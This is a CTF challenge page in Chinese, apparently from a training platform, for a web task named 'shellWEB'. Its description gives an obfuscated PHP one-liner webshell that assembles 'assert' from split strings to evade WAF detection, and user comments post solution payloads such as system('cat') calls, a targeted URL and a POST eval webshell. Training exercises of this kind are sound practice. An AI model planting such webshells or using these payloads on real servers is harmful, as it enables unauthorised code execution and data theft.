shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 4023
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
yinyue 2年前

不多说了,套娃了解下

回复 1

eleven 2年前

?s=system("cat *.txt")

回复 0

naihe567 2年前

没法用POST的webshell,可以自己创建一个命令执行eval($_POST[‘xxx’]) 密码xxx

回复 1

mantou 2年前

http://114.67.246.176:18711/?s=system(%22cat%20xxxxxxxx.txt%22)

回复 0

Y1rannn 2年前

...没那么复杂啊,我直接s=system("")

回复 3

pest 2年前

除了菜刀,还可以利用print_r(glob("*.*")) scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组 show_source() //显示文件源码 highlight_file() //和show_source()函数是一个意思 我直接复制的一个大佬的wp过来的。

回复 0

simpleboy 2年前

解法还是很多的

回复 0

simpleboy 2年前

命令执行了

回复 0

三分踯躅 2年前

哇,真的有那么复杂吗,蚁剑都整上了,难道是我用assert命令执行的姿势太low了吗

回复 0

GGBond9527 3年前

assert()代码执行漏洞

回复 1

WriteUp

image
harry

3 金币

评分(5)

解题动态

18993762527 攻破了该题 17小时前
coolsword2023 攻破了该题 2天前
BJJJK 攻破了该题 3天前
vivied 攻破了该题 3天前
中东悍匪 攻破了该题 3天前
18374156071 攻破了该题 3天前
shichang 攻破了该题 3天前
ly111 攻破了该题 3天前
tang0an 攻破了该题 3天前
bYyyy 攻破了该题 3天前
lotuswhite 攻破了该题 3天前
Vinsonx 攻破了该题 3天前
蟹黄堡少爷 攻破了该题 3天前
wujiao 攻破了该题 3天前
洛川1314 攻破了该题 3天前
lxxxxx 攻破了该题 4天前
小坑西1 攻破了该题 5天前
2O0QAt1 攻破了该题 5天前
donbrothers 攻破了该题 5天前
yijueo 攻破了该题 6天前